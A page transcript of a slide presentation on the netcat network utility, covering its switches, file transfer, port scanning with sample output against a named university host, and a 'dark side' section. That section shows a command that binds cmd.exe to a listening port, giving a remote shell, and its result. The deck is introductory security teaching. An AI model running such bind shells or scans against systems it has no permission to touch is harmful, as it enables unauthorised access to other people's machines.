Groupcompilation 150211212238-conversion-gate02-150212043900-conversion-gate02
8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02
-
Upload
anand-nandani -
Category
Engineering
-
view
628 -
download
0
Transcript of 8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02
![Page 1: 8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02](https://reader035.fdocuments.us/reader035/viewer/2022081604/58a91e4d1a28ab6f508b4f09/html5/thumbnails/1.jpg)
netcat
![Page 2: 8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02](https://reader035.fdocuments.us/reader035/viewer/2022081604/58a91e4d1a28ab6f508b4f09/html5/thumbnails/2.jpg)
Purpose of Presentation…?
Analyze the network Identify the network security issues
How to do it …?
First Step Research the Network
![Page 3: 8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02](https://reader035.fdocuments.us/reader035/viewer/2022081604/58a91e4d1a28ab6f508b4f09/html5/thumbnails/3.jpg)
Tools for Research
Information Gathering tools Forensic tools Network Utility tools Password Auditing tools Recovery And Restoration Tools Vulnerability Scanning & Analysis tools
![Page 4: 8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02](https://reader035.fdocuments.us/reader035/viewer/2022081604/58a91e4d1a28ab6f508b4f09/html5/thumbnails/4.jpg)
What is netcat ?
Swiss Army Knife of Network A versatile network Utility tool Uses TCP and UDP protocol Designed as a backend tool
Can be used directlyDriven by other programs
![Page 5: 8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02](https://reader035.fdocuments.us/reader035/viewer/2022081604/58a91e4d1a28ab6f508b4f09/html5/thumbnails/5.jpg)
Power of netcat
Can create Outbound or Inbound connections TCP or UDP to or from any ports
Full DNS forward reverse checking Can use any local port Can use any locally configured network
address Port scanning with randomizer Option to let other program service
establish connections Optional telnet responder
![Page 6: 8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02](https://reader035.fdocuments.us/reader035/viewer/2022081604/58a91e4d1a28ab6f508b4f09/html5/thumbnails/6.jpg)
How Do I use netcat ?
General form of usage is nc [switches] [hostname] [portnumber]
Simplest Usage would benc –v www.msn.com 80Use GET method GET / HTTP/1.0
Hostname can be a name or IP Address
![Page 7: 8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02](https://reader035.fdocuments.us/reader035/viewer/2022081604/58a91e4d1a28ab6f508b4f09/html5/thumbnails/7.jpg)
Use of –n switch If not specified performs forward and reverse
DNS look up Reports the problem of mismatched names in
DNS
D:\tools\nc>nc -v www.hotmail.com 80DNS fwd/rev mismatch: www.hotmail.com != hotmail.seDNS fwd/rev mismatch: www.hotmail.com != ld.cb.msn.comDNS fwd/rev mismatch: www.hotmail.com != ld.cb.msn.comwww.hotmail.com [207.68.171.233] 80 (http) open
IF specified will take only IPAddress as hostname argument
![Page 8: 8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02](https://reader035.fdocuments.us/reader035/viewer/2022081604/58a91e4d1a28ab6f508b4f09/html5/thumbnails/8.jpg)
Options
-vControls the verbosity level
-w <seconds>Sets the network inactivity timeout
-p <port number>Binds the connection to specific port
number
![Page 9: 8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02](https://reader035.fdocuments.us/reader035/viewer/2022081604/58a91e4d1a28ab6f508b4f09/html5/thumbnails/9.jpg)
Options
-o <file name>To obtain hexdump file of data sent
either way -l
Makes netcat wait for inbound connections
And once connection is established it transfers the data
![Page 10: 8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02](https://reader035.fdocuments.us/reader035/viewer/2022081604/58a91e4d1a28ab6f508b4f09/html5/thumbnails/10.jpg)
Interesting -l
Can use to create like a listening netcat server
On listening endD:\tools\nc>nc –l -p 1234 < test.txt
On client end D:\tools\nc>nc 192.168.0.100 1234
![Page 11: 8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02](https://reader035.fdocuments.us/reader035/viewer/2022081604/58a91e4d1a28ab6f508b4f09/html5/thumbnails/11.jpg)
Options
-LListen harder
-rRandomize port numbers
-zZero – I/O mode [used in scanning]
![Page 12: 8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02](https://reader035.fdocuments.us/reader035/viewer/2022081604/58a91e4d1a28ab6f508b4f09/html5/thumbnails/12.jpg)
Options
-e <program name>Allows to execute a program
(dangerous) -d
Allows to run in detached mode without console window
-uMakes a UDP connection instead of
TCP connection
![Page 13: 8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02](https://reader035.fdocuments.us/reader035/viewer/2022081604/58a91e4d1a28ab6f508b4f09/html5/thumbnails/13.jpg)
Options
-s <address>Local source address
-i <seconds>Specifies delay interval for lines sent
or ports scanned -t
Answer telnet negotiation
![Page 14: 8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02](https://reader035.fdocuments.us/reader035/viewer/2022081604/58a91e4d1a28ab6f508b4f09/html5/thumbnails/14.jpg)
Put the Knife to Use
Use It GOOD
Use It BAD
![Page 15: 8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02](https://reader035.fdocuments.us/reader035/viewer/2022081604/58a91e4d1a28ab6f508b4f09/html5/thumbnails/15.jpg)
USE IT GOOD
Port Scanning
Find what is out there
• nc –v –w 5 –r davinci.newcs.uwindsor.ca 20-30
![Page 16: 8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02](https://reader035.fdocuments.us/reader035/viewer/2022081604/58a91e4d1a28ab6f508b4f09/html5/thumbnails/16.jpg)
D:\tools\nc>nc -v -w 5 -r davinci.newcs.uwindsor.ca 20-30davinci.newcs.uwindsor.ca [137.207.76.3] 22 (?) openSSH-2.0-Sun_SSH_1.0davinci.newcs.uwindsor.ca [137.207.76.3] 28 (?) opendavinci.newcs.uwindsor.ca [137.207.76.3] 20 (ftp-data) opendavinci.newcs.uwindsor.ca [137.207.76.3] 23 (telnet) openinternet2 proxy-telnet [v3.1] ready
√☺Please enter your userid: davinci.newcs.uwindsor.ca [137.207.76.3] 24 (?) opendavinci.newcs.uwindsor.ca [137.207.76.3] 30 (?) opendavinci.newcs.uwindsor.ca [137.207.76.3] 25 (smtp) open220-Sendmail 8.6.12/8.6.12 ready on internet2220 ESMTP spoken heredavinci.newcs.uwindsor.ca [137.207.76.3] 26 (?) opendavinci.newcs.uwindsor.ca [137.207.76.3] 29 (?) opendavinci.newcs.uwindsor.ca [137.207.76.3] 27 (?) opendavinci.newcs.uwindsor.ca [137.207.76.3] 21 (ftp) open220- internet2 proxy-ftp [v3.1] ready220 Please enter your userid
D:\tools\nc>
![Page 17: 8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02](https://reader035.fdocuments.us/reader035/viewer/2022081604/58a91e4d1a28ab6f508b4f09/html5/thumbnails/17.jpg)
USE IT GOOD
Simple Data Transfer AgentImmaterial which side is server and
which side is clientInput at one goes as output to another
HEX Dump FeatureCan be used to analyze odd network
protocols
![Page 18: 8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02](https://reader035.fdocuments.us/reader035/viewer/2022081604/58a91e4d1a28ab6f508b4f09/html5/thumbnails/18.jpg)
USE IT GOOD
Performance Testing
Generate large amount of useless data on network with server on one end and client on other end we can use it to test network performance.
Protect your workstations X server
![Page 19: 8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02](https://reader035.fdocuments.us/reader035/viewer/2022081604/58a91e4d1a28ab6f508b4f09/html5/thumbnails/19.jpg)
DARK SIDE
Scanning for vulnerable servicesCan use files as input to netcat and
scan the system by using –i and –r switches
Can use –e option to execute programs
SYN-Bombing Can disable TCP servers
![Page 20: 8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02](https://reader035.fdocuments.us/reader035/viewer/2022081604/58a91e4d1a28ab6f508b4f09/html5/thumbnails/20.jpg)
EXAMPLE
Listen on port 21 (FTP Port) using netcat with –e switch to execute cmd.exe
FTP request made from a different machine on the listener machine
![Page 21: 8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02](https://reader035.fdocuments.us/reader035/viewer/2022081604/58a91e4d1a28ab6f508b4f09/html5/thumbnails/21.jpg)
RESULT
D:\tools\nc>nc -l -p 21 -e cmd.exeLISTENER
C:\Documents and Settings\RAJAT>ftp 192.168.0.100Connected to 192.168.0.100.Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.
D:\tools\nc>Request
![Page 22: 8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02](https://reader035.fdocuments.us/reader035/viewer/2022081604/58a91e4d1a28ab6f508b4f09/html5/thumbnails/22.jpg)
Environment
Local Home Network
ISP --- CogecoThree PC’s OS Windows XPConnected via DLink RouterCat 5 connecting cables used
![Page 23: 8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02](https://reader035.fdocuments.us/reader035/viewer/2022081604/58a91e4d1a28ab6f508b4f09/html5/thumbnails/23.jpg)
Conclusion
Netcat is a very useful network utility tool
Very light but extremely effective Particularly when it can listen and
execute programs when connection requests are made on the specific ports
![Page 25: 8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02](https://reader035.fdocuments.us/reader035/viewer/2022081604/58a91e4d1a28ab6f508b4f09/html5/thumbnails/25.jpg)
THANK YOU